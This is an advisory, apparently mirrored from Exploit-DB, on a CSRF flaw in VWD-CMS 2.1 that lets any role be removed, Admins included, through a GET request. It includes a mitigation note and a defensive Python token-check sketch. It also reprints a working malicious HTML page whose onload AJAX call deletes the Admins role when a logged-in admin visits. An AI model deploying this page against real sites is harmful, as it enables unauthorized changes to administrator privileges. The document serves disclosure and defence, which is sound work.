Vendor: VWD-CMS
By: abysssec.com
CVSS: 8.8 (HIGH)
CWE-352: Cross-Site Request Forgery (CSRF)
Product Name: VWD-CMS
Affected Version From: VWD-CMS version 2.1
Affected Version To: VWD-CMS version 2.1
Patch Exists: YES
Related CWE: N/A
CPE: a:vwd-cms:vwd-cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

VWD-CMS CSRF Vulnerability

VWD-CMS has a CSRF vulnerability that allows any role to be removed, in particular the Admins role. With this vulnerability, an attacker can lead the admin to visit a malicious site (when he is already logged in) to remove a role. The malicious site contains an HTML file with AJAX code that uses the GET method for this operation; it is enough for the admin to visit it.

Mitigation:

Implementing a CSRF token in the application can help mitigate this vulnerability.
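
The mitigation above, sketched as an added example (not VWD-CMS code and not part of the original advisory): a role-deletion check that refuses GET, rejects cross-site origins, and requires a session-bound CSRF token. The function names, the `csrf_token` form field and the `TRUSTED_ORIGIN` value are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: per-deployment secret held only by the server (random for this demo).
SERVER_KEY = secrets.token_bytes(32)
# Assumption: the CMS's own origin; the advisory uses Example.com as its placeholder host.
TRUSTED_ORIGIN = "http://example.com"


def _mac(session_id: str, nonce: str) -> str:
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_token(session_id: str) -> str:
    """Token bound to one session; rendered as a hidden field in the role form."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def token_valid(session_id: str, token: str) -> bool:
    nonce, _, sig = (token or "").partition(".")
    # Constant-time comparison avoids leaking how much of the MAC matched.
    return hmac.compare_digest(sig.encode(), _mac(session_id, nonce).encode())


def authorize_role_delete(method, session_id, form, headers):
    """Decide whether a role-deletion request may proceed: (allowed, reason)."""
    if method != "POST":
        return False, "state change must not be reachable via GET"
    source = headers.get("Origin") or headers.get("Referer", "")
    if source:
        parts = urlsplit(source)
        if f"{parts.scheme}://{parts.netloc}".lower() != TRUSTED_ORIGIN:
            return False, "cross-site origin"
    if not token_valid(session_id, form.get("csrf_token", "")):
        return False, "missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    sid = "sess-admin-1"  # constructed session id
    good = {"role": "Members", "csrf_token": issue_token(sid)}
    own = {"Origin": TRUSTED_ORIGIN}
    print(authorize_role_delete("GET", sid, {"role": "Admins"}, {}))
    print(authorize_role_delete("POST", sid, {"role": "Admins"}, own))
    print(authorize_role_delete("POST", sid, good, own))
```

A token issued for one session fails validation for any other, so a page on another site cannot supply a valid value on the admin's behalf.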
Source

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 


 
 
  Title            :  VWD-CMS CSRF Vulnerability
  Affected Version :  VWD-CMS version 2.1
  Discovery        :  www.abysssec.com
  Vendor	   :  http://www.vwd-cms.com/

  Demo  	   :  http://server/templates/Emerald.aspx
		      http://server/templates/balloonr.aspx

  Download Links   :  http://vwdcms.codeplex.com/
  
  Admin Page       :  http://Example.com/login.aspx
  
http://www.exploit-db.com/moaub-20-vwd-cms-csrf-vulnerability/
'''
 
1)CSRF :
===========================================================================================      
  VWD-CMS has a CSRF vulnerability that allows any role to be removed, especially the Admins role.
  With this vulnerability you can lead the admin to visit a malicious site (when he is already logged in)
  to remove a role.

 A role can be removed through this path:
        http://Example.com/VwdCms/Members/RoleEdit.aspx?delete=yes&role=RoleName
        (RoleName can be Admins or Members)
  
  Here is an HTML file with AJAX code that uses the GET method for this operation; it is enough for the admin to visit it.


The Source of HTML Page (Malicious Site) 
===========================================================================================     
  

<html>
<head>
<title >Wellcome to My Site!</title>
Hello!
...
...
...
This page remove Admins Role in VWD-CMS. 

<script>          
        // http is declared at script scope so that done() can read it.
        var http = false;

        function RemoveRole() {
            try {
                netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
            } catch (e) {}

            if (window.XMLHttpRequest) {
                http = new XMLHttpRequest();
            }
            else if (window.ActiveXObject) {
                http = new ActiveXObject("Microsoft.XMLHTTP");                
            }

            url = "http://server/VwdCms/Members/RoleEdit.aspx?delete=yes&role=Admins";
            http.onreadystatechange = done;
            http.open('GET', url, true);
            http.send(null);
        }
        function done() {
            if (http.readyState == 4 && http.status == 200) 
            {               
            }
        }     
</script>
</head>
<body onload ="RemoveRole();">
</body>
</html>



===========================================================================================